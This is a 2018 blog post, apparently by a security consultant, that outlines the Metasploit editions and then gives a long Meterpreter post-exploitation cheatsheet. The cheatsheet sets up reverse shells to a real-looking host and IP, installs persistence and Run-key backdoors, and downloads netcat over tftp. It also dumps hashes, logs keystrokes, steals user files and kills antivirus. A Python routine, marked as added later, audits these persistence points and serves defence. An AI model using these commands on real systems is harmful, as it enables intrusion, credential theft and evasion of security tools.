22 Oct 2018

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Metasploit is best known for the Metasploit Framework, in which users can build their own tools for finding exploits in applications, operating systems and networks: a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, the shellcode archive and related research.

Metasploit interfaces

There are several interfaces for Metasploit available. The most popular are maintained by Rapid7 and Strategic Cyber LLC.

Metasploit Framework Edition

The free version. It contains a command line interface, third-party import, manual exploitation and manual brute forcing. This free version of the Metasploit Project also includes Zenmap, a well-known port scanner, and a compiler for Ruby, the language in which this version of Metasploit was written.

Metasploit Community Edition

In October 2011, Rapid7 released Metasploit Community Edition, a free, web-based user interface for Metasploit. Metasploit Community is based on the commercial functionality of the paid-for editions with a reduced set of features, including network discovery, module browsing and manual exploitation. Metasploit Community is included in the main installer.

Metasploit Express

In April 2010, Rapid7 released Metasploit Express, an open-core commercial edition for security teams who need to verify vulnerabilities. It offers a graphical user interface, integrates nmap for discovery, and adds smart brute forcing as well as automated evidence collection.

Metasploit Pro

In October 2010, Rapid7 added Metasploit Pro, an open-core commercial Metasploit edition for penetration testers. Metasploit Pro adds onto Metasploit Express with features such as Quick Start Wizards/MetaModules, building and managing social engineering campaigns, web application testing, an advanced Pro Console, dynamic payloads for anti-virus evasion, integration with Nexpose for ad-hoc vulnerability scans, and VPN pivoting.

Armitage

Armitage is a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits. It is a free and open source network security tool notable for its contributions to red team collaboration, allowing for shared sessions, data, and communication through a single Metasploit instance.

Cobalt Strike

Cobalt Strike is a collection of threat emulation tools provided by Strategic Cyber LLC to work with the Metasploit Framework. Cobalt Strike includes all features of Armitage and adds post-exploitation tools, in addition to report generation features.

Metasploit Cheatsheet and Commands are as follows.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript <path to the script you want to autorun after the exploit is run>
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
exploit -j -z


# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3
wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf
./msfconsole
db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21
setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run


# shows all the scripts
run


# persistence! broken if you use a DNS name
run persistence -r 75.139.158.51 -p 21 -A -X -i 30


run get_pidgin_creds
idletime
sysinfo


# SYSTEM SHELL (pick a process that is run by SYSTEM)
migrate 376
shell


# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"


# escalate to system
use priv
getsystem


execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t


# list top used apps
run prefetchtool -x 20


# list installed apps
run prefetchtool -p


run get_local_subnets


# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop" passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office


# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/


# alternate to shell, not SYSTEM
# execute -f cmd.exe -H -c -i -t


# runs some wmic commands etc.
run winenum


# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"


# An example of a run of the file to download Netcat via tftp and then run it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4


# vnc / port fwd for linux
run vnc


# priv esc
run kitrap0d


run getgui


# somewhat broken .. google "sdt cleaner NtTerminateProcess"
run killav
run winenum
run memdump
run screen_unlock


upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
reg setval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"


getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666


shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787


run msf_bind
run msf_bind -p 1975
rev2self
getuid


getuid
enumdesktops
grabdesktop
run deploymsf -f framework-3.3-dev.exe
run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254


# Windows Login Brute Force Meterpreter Script
run winbf -h


# upload a script or executable and run it
uploadexec


# Using Payload As A Backdoor from a shell
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011
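As an added, defender-side example (not from the original post), the following Python audits the two persistence points used in this section, the HKCU Run key and scheduled tasks, against constructed sample output of `reg query` and `schtasks /query /fo csv /v`; the sample data, the baseline set of expected autorun names and the heuristics are assumptions made for the example.

```python
import csv, io, re

# Constructed sample of `reg query HKCU\...\Run` output; not captured from a real host.
RUN_KEY_DUMP = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    firewall    REG_SZ    c:\windows\system32\metabkdr.exe
    system32    REG_SZ    C:\windows\system32\system32.exe -Ldp 455 -e cmd.exe
"""
# Constructed sample of `schtasks /query /fo csv /v` rows, trimmed to the columns used here.
TASK_CSV = r"""TaskName,Run As User,Schedule Type,Repeat: Every,Task To Run
\FIREWALL,SYSTEM,Minute,0:45:00,%USERPROFILE%\metabkdr.exe
\EdgeUpdate,INTERACTIVE,Daily,N/A,"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c"
"""
# Assumed baseline of autorun value names expected on this build; anything else gets reviewed.
BASELINE_RUN_VALUES = {"OneDrive"}

# Netcat-style listener switches seen in the cheatsheet (-e cmd.exe, -L -p N, -Ldp N).
LISTENER_ARGS = re.compile(r"-e\s+cmd\.exe|-Ldp?\s*\d+|-L\s+-p\s+\d+", re.I)
# Executables named after Windows components (the cheatsheet drops a "system32.exe").
SYSTEM_NAME_REUSE = re.compile(r"\\(system32|svchost|lsass|csrss)\.exe$", re.I)
USER_PROFILE = re.compile(r"%USERPROFILE%|\\Users\\|Documents and Settings", re.I)


def audit_run_key(dump: str) -> list:
    """Return (value name, reason) for Run-key entries a responder should look at."""
    findings = []
    for line in dump.splitlines():
        m = re.match(r"\s+(\S+)\s+REG_\w+\s+(.+)$", line)
        if not m:
            continue
        name, cmd = m.group(1), m.group(2).strip()
        exe = cmd.split('"')[1] if cmd.startswith('"') else cmd.split()[0]
        if LISTENER_ARGS.search(cmd):
            findings.append((name, "listener-style arguments (bind shell)"))
        elif SYSTEM_NAME_REUSE.search(exe):
            findings.append((name, "binary named like a Windows component"))
        elif name not in BASELINE_RUN_VALUES:
            findings.append((name, "autorun value not in baseline"))
    return findings


def audit_tasks(csv_text: str) -> list:
    """Flag tasks that run as SYSTEM on a minute repeat from a user-writable path."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text.strip())):
        cmd = row["Task To Run"]
        if (row["Run As User"].upper() == "SYSTEM" and row["Schedule Type"].lower() == "minute"
                and USER_PROFILE.search(cmd)):
            findings.append((row["TaskName"], "SYSTEM task repeating every few minutes from a user-profile path"))
        elif LISTENER_ARGS.search(cmd):
            findings.append((row["TaskName"], "listener-style arguments (bind shell)"))
    return findings
```

The baseline rule is what catches an innocuously named binary such as the "firewall" entry; the pattern rules alone would miss it, so compare against a known-good autorun inventory rather than relying on argument signatures.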


# kill AV: this will not unload it from memory, it needs a reboot or a kill from memory; the Darkspy, Seem and Icesword GUIs can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy

IT Security Professional – Security Researcher & Consultant for the Government, Enthusiast, Malware Analyst, Penetration Tester.
